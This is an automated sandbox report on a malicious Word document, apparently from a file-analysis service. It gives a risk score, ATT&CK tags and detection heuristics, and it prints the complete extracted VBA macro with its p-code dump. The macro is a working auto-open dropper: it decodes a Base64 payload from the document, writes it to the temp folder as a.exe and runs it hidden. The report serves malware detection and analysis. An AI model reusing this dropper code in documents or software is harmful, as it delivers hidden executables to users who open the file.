MALICIOUS
218
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Reverse Engineer
T1204.002 Malicious File
T1027 Obfuscated Files or Information
The sample is a malicious Office document containing a VBA macro. The `autoopen` subroutine within the `macros.bas` script is designed to extract embedded Base64 encoded data, decode it, save it as `a.exe` in the temporary directory, and then execute it using `Shell filename, vbHide`. This indicates the document's primary purpose is to act as a dropper for a second-stage executable payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6385029-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6385029-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell filename, vbHide End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() Dim handle As Long -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
filename = Environ("tmp") & "\a.exe" handle = FreeFile -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly00000E93 41 inc ecx 00000E94 41 inc ecx 00000E95 41 inc ecx 00000E96 41 inc ecx 00000E97 41 inc ecx 00000E98 41 inc ecx 00000E99 41 inc ecx 00000E9A 41 inc ecx 00000E9B 41 inc ecx 00000E9C 41 inc ecx 00000E9D 41 inc ecx 00000E9E 41 inc ecx 00000E9F 41 inc ecx 00000EA0 41 inc ecx 00000EA1 41 inc ecx 00000EA2 41 inc ecx 00000EA3 41 inc ecx 00000EA4 41 inc ecx 00000EA5 41 inc ecx 00000EA6 41 inc ecx 00000EA7 41 inc ecx 00000EA8 41 inc ecx 00000EA9 41 inc ecx 00000EAA 41 inc ecx 00000EAB 41 inc ecx 00000EAC 41 inc ecx 00000EAD 41 inc ecx 00000EAE 41 inc ecx 00000EAF 41 inc ecx 00000EB0 41 inc ecx 00000EB1 41 inc ecx 00000EB2 41 inc ecx 00000EB3 41 inc ecx 00000EB4 41 inc ecx 00000EB5 41 inc ecx 00000EB6 41 inc ecx 00000EB7 41 inc ecx 00000EB8 41 inc ecx 00000EB9 41 inc ecx 00000EBA 41 inc ecx 00000EBB 41 inc ecx 00000EBC 41 inc ecx 00000EBD 41 inc ecx 00000EBE 41 inc ecx 00000EBF 41 inc ecx 00000EC0 41 inc ecx 00000EC1 41 inc ecx 00000EC2 41 inc ecx 00000EC3 41 inc ecx 00000EC4 41 inc ecx 00000EC5 41 inc ecx 00000EC6 41 inc ecx 00000EC7 41 inc ecx 00000EC8 41 inc ecx 00000EC9 41 inc ecx 00000ECA 41 inc ecx 00000ECB 41 inc ecx 00000ECC 41 inc ecx 00000ECD 41 inc ecx 00000ECE 41 inc ecx 00000ECF 41 inc ecx 00000ED0 41 inc ecx 00000ED1 41 inc ecx 00000ED2 41 inc ecx 00000ED3 41 inc ecx 00000ED4 41 inc ecx 00000ED5 41 inc ecx 00000ED6 41 inc ecx 00000ED7 41 inc ecx 00000ED8 41 inc ecx 00000ED9 41 inc ecx 00000EDA 41 inc ecx 00000EDB 41 inc ecx 00000EDC 41 inc ecx 00000EDD 41 inc ecx 00000EDE 41 inc ecx 00000EDF 41 inc ecx 00000EE0 41 inc ecx 00000EE1 41 inc ecx 00000EE2 41 inc ecx 00000EE3 41 inc ecx 00000EE4 41 inc ecx 00000EE5 41 inc ecx 00000EE6 41 inc ecx 00000EE7 41 inc ecx 00000EE8 41 inc ecx 00000EE9 41 inc ecx 00000EEA 41 inc ecx 00000EEB 41 inc ecx 00000EEC 41 inc ecx 00000EED 41 inc ecx 00000EEE 41 inc ecx 00000EEF 41 inc ecx 00000EF0 41 inc ecx 00000EF1 41 inc ecx 00000EF2 41 inc ecx
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13123 bytes |
SHA-256: f1a6d82eec72a29c76b8969308580625ef8ecaaf8dd0918eb194690ee0a0d350 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
Sub autoopen()
Dim handle As Long
Dim filename As String
Dim data() As Byte
Dim text As String
Init
filename = Environ("tmp") & "\a.exe"
handle = FreeFile
text = GetEmbedded()
data = Base64Decode(Mid(text, 2, Len(text) - 2))
Open filename For Binary Access Write As #handle
Put #handle, 1, data
Close #handle
Shell filename, vbHide
End Sub
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Public Function Base64Decode(ByVal s As String) As Byte()
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim v As Byte: v = IBuf(UBound(IBuf))
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Function GetEmbedded() As String
GetEmbedded = ActiveDocument.Paragraphs(3).Range.text
End Function
' Processing file: /tmp/qstore__r_ebmmf
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11070 bytes
' Line #0:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x003F
' VarDefn Map1 (As Byte) 0x0017
' Line #1:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x007F
' VarDefn Map2 (As Byte)
' Line #2:
' Line #3:
' FuncDefn (Sub autoopen())
' Line #4:
' Dim
' VarDefn handle (As Long)
' Line #5:
' Dim
' VarDefn filename (As String)
' Line #6:
' Dim
' VarDefn data (As Byte)
' Line #7:
' Dim
' VarDefn Text (As String)
' Line #8:
' ArgsCall Init 0x0000
' Line #9:
' Line #10:
' LitStr 0x0003 "tmp"
' ArgsLd Environ 0x0001
' LitStr 0x0006 "\a.exe"
' Concat
' St filename
' Line #11:
' Ld FreeFile
' St handle
' Line #12:
' ArgsLd GetEmbedded 0x0000
' St Text
' Line #13:
' Ld Text
' LitDI2 0x0002
' Ld Text
' FnLen
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' ArgsLd Base64Decode 0x0001
' St data
' Line #14:
' Ld filename
' Ld handle
' Sharp
' LitDefault
' Open (For Binary Access Write)
' Line #15:
' Ld handle
' Sharp
' LitDI2 0x0001
' Ld data
' PutRec
' Line #16:
' Ld handle
' Sharp
' Close 0x0001
' Line #17:
' Line #18:
' Ld filename
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Init())
' Line #22:
' Dim
' VarDefn c (As Integer)
' VarDefn i (As Integer)
' Line #23:
' QuoteRem 0x0003 0x0009 " set Map1"
' Line #24:
' LitDI2 0x0000
' St i
' Line #25:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "Z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #26:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "a"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #27:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "0"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "9"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #28:
' LitStr 0x0001 "+"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #29:
' LitStr 0x0001 "/"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #30:
' QuoteRem 0x0003 0x0009 " set Map2"
' Line #31:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x007F
' For
' BoS 0x0000
' LitDI2 0x00FF
' Ld i
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #32:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x003F
' For
' BoS 0x0000
' Ld i
' Ld i
' ArgsLd Map1 0x0001
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Function ConvertStringToBytes(ByVal s As String, id_FFFE As ) As Append)
' Line #36:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld s
' St b1
' Line #37:
' Dim
' VarDefn l (As Long)
' BoS 0x0000
' Ld b1
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0002
' IDiv
' St l
' Line #38:
' Ld l
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' Ld b1
' St ConvertStringToBytes
' BoS 0x0000
' ExitFunc
' EndIf
' Line #39:
' Dim
' VarDefn b2 (As Byte)
' Line #40:
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' RedimAs b2 0x0001 (As Byte)
' Line #41:
' Dim
' VarDefn p (As Long)
' Line #42:
' StartForVariable
' Ld p
' EndForVariable
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' For
' Line #43:
' Dim
' VarDefn c (As Long)
' BoS 0x0000
' LitDI2 0x0002
' Ld p
' Mul
' ArgsLd b1 0x0001
' LitDI2 0x0100
' LitDI2 0x0002
' Ld p
' Mul
' LitDI2 0x0001
' Add
' ArgsLd b1 0x0001
' Coerce (Lng)
' Mul
' Add
' St c
' Line #44:
' Ld c
' LitDI2 0x0100
' Ge
' If
' BoSImplicit
' LitStr 0x0001 "?"
' ArgsLd Asc 0x0001
' St c
' EndIf
' Line #45:
' Ld c
' Ld p
' ArgsSt b2 0x0001
' Line #46:
' StartForVariable
' Next
' Line #47:
' Ld b2
' St ConvertStringToBytes
' Line #48:
' EndFunc
' Line #49:
' Line #50:
' FuncDefn (Public Function Base64Decode(ByVal s As String, id_FFFE As ) As Append)
' Line #51:
' Dim
' VarDefn IBuf (As Byte)
' BoS 0x0000
' Ld s
' ArgsLd ConvertStringToBytes 0x0001
' St IBuf
' Line #52:
' Dim
' VarDefn v (As Byte)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' ArgsLd IBuf 0x0001
' St v
' Line #53:
' Dim
' VarDefn ILen (As Long)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' St ILen
' Line #54:
' Line #55:
' Ld ILen
' LitDI2 0x0004
' Mod
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x003D "Length of Base64 encoded input string is not a multiple of 4."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #56:
' Ld ILen
' LitDI2 0x0000
' Gt
' DoWhile
' Line #57:
' Ld ILen
' LitDI2 0x0001
' Sub
' ArgsLd IBuf 0x0001
' LitStr 0x0001 "="
' ArgsLd Asc 0x0001
' Ne
' If
' BoSImplicit
' ExitDo
' EndIf
' Line #58:
' Ld ILen
' LitDI2 0x0001
' Sub
' St ILen
' Line #59:
' Loop
' Line #60:
' Dim
' VarDefn OLen (As Long)
' BoS 0x0000
' Ld ILen
' LitDI2 0x0003
' Mul
' Paren
' LitDI2 0x0004
' IDiv
' St OLen
' Line #61:
' Dim
' VarDefn Out (As Byte)
' Line #62:
' LitDI2 0x0000
' Ld OLen
' LitDI2 0x0001
' Sub
' RedimAs Out 0x0001 (As Byte)
' Line #63:
' Dim
' VarDefn ip (As Long)
' Line #64:
' Dim
' VarDefn op (As Long)
' Line #65:
' Ld ip
' Ld ILen
' Lt
' DoWhile
' Line #66:
' Dim
' VarDefn i0 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i0
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #67:
' Dim
' VarDefn i1 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i1
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #68:
' Dim
' VarDefn i2 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i2
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i2
' EndIf
' Line #69:
' Dim
' VarDefn i3 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i3
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i3
' EndIf
' Line #70:
' LineCont 0x0004 11 00 09 00
' Ld i0
' LitDI2 0x007F
' Gt
' Ld i1
' LitDI2 0x007F
' Gt
' Or
' Ld i2
' LitDI2 0x007F
' Gt
' Or
' Ld i3
' LitDI2 0x007F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #71:
' Dim
' VarDefn b0 (As Byte)
' BoS 0x0000
' Ld i0
' ArgsLd Map2 0x0001
' St b0
' Line #72:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld i1
' ArgsLd Map2 0x0001
' St b1
' Line #73:
' Dim
' VarDefn b2 (As Byte)
' BoS 0x0000
' Ld i2
' ArgsLd Map2 0x0001
' St b2
' Line #74:
' Dim
' VarDefn b3 (As Byte)
' BoS 0x0000
' Ld i3
' ArgsLd Map2 0x0001
' St b3
' Line #75:
' LineCont 0x0004 11 00 09 00
' Ld b0
' LitDI2 0x003F
' Gt
' Ld b1
' LitDI2 0x003F
' Gt
' Or
' Ld b2
' LitDI2 0x003F
' Gt
' Or
' Ld b3
' LitDI2 0x003F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #76:
' Dim
' VarDefn o0 (As Byte)
' BoS 0x0000
' Ld b0
' LitDI2 0x0004
' Mul
' Paren
' Ld b1
' LitHI2 0x0010
' IDiv
' Paren
' Or
' St o0
' Line #77:
' Dim
' VarDefn o1 (As Byte)
' BoS 0x0000
' Ld b1
' LitHI2 0x000F
' And
' Paren
' LitHI2 0x0010
' Mul
' Paren
' Ld b2
' LitDI2 0x0004
' IDiv
' Paren
' Or
' St o1
' Line #78:
' Dim
' VarDefn o2 (As Byte)
' BoS 0x0000
' Ld b2
' LitDI2 0x0003
' And
' Paren
' LitHI2 0x0040
' Mul
' Paren
' Ld b3
' Or
' St o2
' Line #79:
' Ld o0
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' Line #80:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o1
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #81:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o2
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #82:
' Loop
' Line #83:
' Ld Out
' St Base64Decode
' Line #84:
' EndFunc
' Line #85:
' Line #86:
' FuncDefn (Private Function GetEmbedded(id_FFFE As String) As String)
' Line #87:
' LitDI2 0x0003
' Ld ActiveDocument
' ArgsMemLd Paragraphs 0x0001
' MemLd Range
' MemLd Text
' St GetEmbedded
' Line #88:
' EndFunc
' Line #89:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.